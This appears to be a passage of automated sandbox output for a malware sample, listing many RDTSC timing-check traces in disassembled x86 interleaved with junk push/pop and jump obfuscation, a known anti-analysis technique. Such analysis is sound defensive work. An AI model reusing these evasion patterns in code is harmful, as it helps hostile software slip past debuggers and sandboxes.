Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE6B06 second address: CE6B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FE0491DA106h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE6B17 second address: CE6B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE681A second address: CE6830 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFE9D6 second address: CFE9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFE9DE second address: CFE9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEB2E second address: CFEB3C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FE048D0589Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEB3C second address: CFEB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE0491DA118h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d jbe 00007FE0491DA106h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEDCA second address: CFEDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEDD0 second address: CFEDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEDD4 second address: CFEDE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEDE8 second address: CFEE1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Eh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FE0491DA118h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEF50 second address: CFEF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEF54 second address: CFEF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFEF5A second address: CFEF7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D0589Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE048D0589Fh 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF37D second address: CFF381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF381 second address: CFF385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF385 second address: CFF395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FE0491DA106h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF395 second address: CFF3A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D0589Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF3A3 second address: CFF3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FE0491DA11Bh 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FE0491DA106h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF51D second address: CFF52D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE048D05896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF7F3 second address: CFF809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA112h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF809 second address: CFF82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE048D058A2h 0x0000000c jns 00007FE048D05896h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D02663 second address: D026B1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE0491DA108h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f stc 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FE0491DA108h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D26D3h], edi 0x00000032 push CCDBF089h 0x00000037 push eax 0x00000038 pushad 0x00000039 jmp 00007FE0491DA10Dh 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D073C0 second address: D073C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0EA4 second address: 53A0EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390BE5 second address: 5390C19 instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FE048D0589Dh 0x0000000d or cx, 6C76h 0x00000012 jmp 00007FE048D058A1h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390C19 second address: 5390C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390C1D second address: 5390C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390C21 second address: 5390C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D063C second address: 53D0641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0641 second address: 53D0647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0647 second address: 53D064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D064B second address: 53D064F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D064F second address: 53D0679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE048D058A0h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE048D0589Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0679 second address: 53D068B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0491DA10Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D068B second address: 53D068F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D068F second address: 53D06CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE0491DA117h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov esi, edx 0x00000015 call 00007FE0491DA117h 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D06CF second address: 53D070B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE048D0589Dh 0x00000013 jmp 00007FE048D0589Bh 0x00000018 popfd 0x00000019 movzx eax, bx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53700DD second address: 5370168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edx, ecx 0x0000000d jmp 00007FE0491DA118h 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FE0491DA10Bh 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FE0491DA116h 0x0000001f mov ebp, esp 0x00000021 jmp 00007FE0491DA110h 0x00000026 push dword ptr [ebp+04h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FE0491DA117h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370168 second address: 5370192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 9FAAh 0x00000007 mov ah, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE048D058A9h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370192 second address: 53701AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ah, 7Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53701AF second address: 53701C7 instructions: 0x00000000 rdtsc 0x00000002 mov bl, 06h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FE048D058A0h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53909E5 second address: 53909EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53909EB second address: 53909EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53909EF second address: 5390A3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE0491DA119h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FE0491DA119h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390A3A second address: 5390A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539054B second address: 5390551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390551 second address: 5390555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390555 second address: 5390559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539043B second address: 5390453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE048D058A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390453 second address: 539046B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539046B second address: 5390471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390471 second address: 53904E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0491DA113h 0x00000013 add ax, 4FAEh 0x00000018 jmp 00007FE0491DA119h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FE0491DA110h 0x00000024 jmp 00007FE0491DA115h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53904E1 second address: 53904F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE048D0589Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53904F1 second address: 5390507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0491DA10Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390219 second address: 539021D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539021D second address: 539022E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539022E second address: 5390233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390233 second address: 5390282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 674783B0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FE0491DA114h 0x00000012 mov dword ptr [esp], ebp 0x00000015 jmp 00007FE0491DA110h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FE0491DA117h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D0542 second address: 53D055F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D055F second address: 53D05E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 call 00007FE0491DA113h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esp 0x00000010 pushad 0x00000011 call 00007FE0491DA112h 0x00000016 push esi 0x00000017 pop ebx 0x00000018 pop esi 0x00000019 mov ax, bx 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 jmp 00007FE0491DA119h 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FE0491DA113h 0x00000030 jmp 00007FE0491DA113h 0x00000035 popfd 0x00000036 mov ax, F5DFh 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D05E5 second address: 53D060E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE048D0589Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D060E second address: 53D061E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0491DA10Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0162 second address: 53B018A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE048D0589Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B018A second address: 53B01B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE0491DA116h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B01B8 second address: 53B01BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B01BC second address: 53B01C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B01C2 second address: 53B023E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov eax, 5E1A1F2Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebp+08h] 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FE048D058A6h 0x00000017 jmp 00007FE048D058A5h 0x0000001c popfd 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 and dword ptr [eax], 00000000h 0x00000023 jmp 00007FE048D0589Ah 0x00000028 and dword ptr [eax+04h], 00000000h 0x0000002c jmp 00007FE048D058A0h 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FE048D058A7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539039C second address: 53903B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0491DA114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53903B4 second address: 53903B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0D42 second address: 53A0D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0D50 second address: 53A0E02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE048D058A1h 0x00000009 jmp 00007FE048D0589Bh 0x0000000e popfd 0x0000000f mov di, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FE048D058A0h 0x0000001d sbb cl, 00000038h 0x00000020 jmp 00007FE048D0589Bh 0x00000025 popfd 0x00000026 pushad 0x00000027 mov bx, si 0x0000002a call 00007FE048D058A2h 0x0000002f pop esi 0x00000030 popad 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 call 00007FE048D0589Eh 0x00000039 call 00007FE048D058A2h 0x0000003e pop esi 0x0000003f pop ebx 0x00000040 call 00007FE048D058A0h 0x00000045 mov ah, EAh 0x00000047 pop edx 0x00000048 popad 0x00000049 xchg eax, ebp 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FE048D0589Fh 0x00000052 mov si, 610Fh 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0E02 second address: 53A0E23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA115h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0E23 second address: 53A0E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0E27 second address: 53A0E2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A0E2D second address: 53A0E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0034 second address: 53B007B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE0491DA116h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FE0491DA110h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE0491DA10Ah 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B007B second address: 53B008A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D0589Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0CD9 second address: 53C0D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e movsx ebx, si 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007FE0491DA111h 0x00000018 jmp 00007FE0491DA10Bh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0D11 second address: 53C0D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0D15 second address: 53C0D27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0D27 second address: 53C0D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0D2D second address: 53C0D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0D31 second address: 53C0D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0D35 second address: 53C0DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE0491DA119h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FE0491DA10Ch 0x00000017 or cx, 41A8h 0x0000001c jmp 00007FE0491DA10Bh 0x00000021 popfd 0x00000022 popad 0x00000023 push ebx 0x00000024 pushad 0x00000025 push esi 0x00000026 jmp 00007FE0491DA117h 0x0000002b pop esi 0x0000002c push ebx 0x0000002d mov si, AF9Bh 0x00000031 pop esi 0x00000032 popad 0x00000033 mov dword ptr [esp], ecx 0x00000036 pushad 0x00000037 call 00007FE0491DA10Dh 0x0000003c pushfd 0x0000003d jmp 00007FE0491DA110h 0x00000042 and si, A998h 0x00000047 jmp 00007FE0491DA10Bh 0x0000004c popfd 0x0000004d pop eax 0x0000004e mov ebx, 237FBADCh 0x00000053 popad 0x00000054 mov eax, dword ptr [76FA65FCh] 0x00000059 jmp 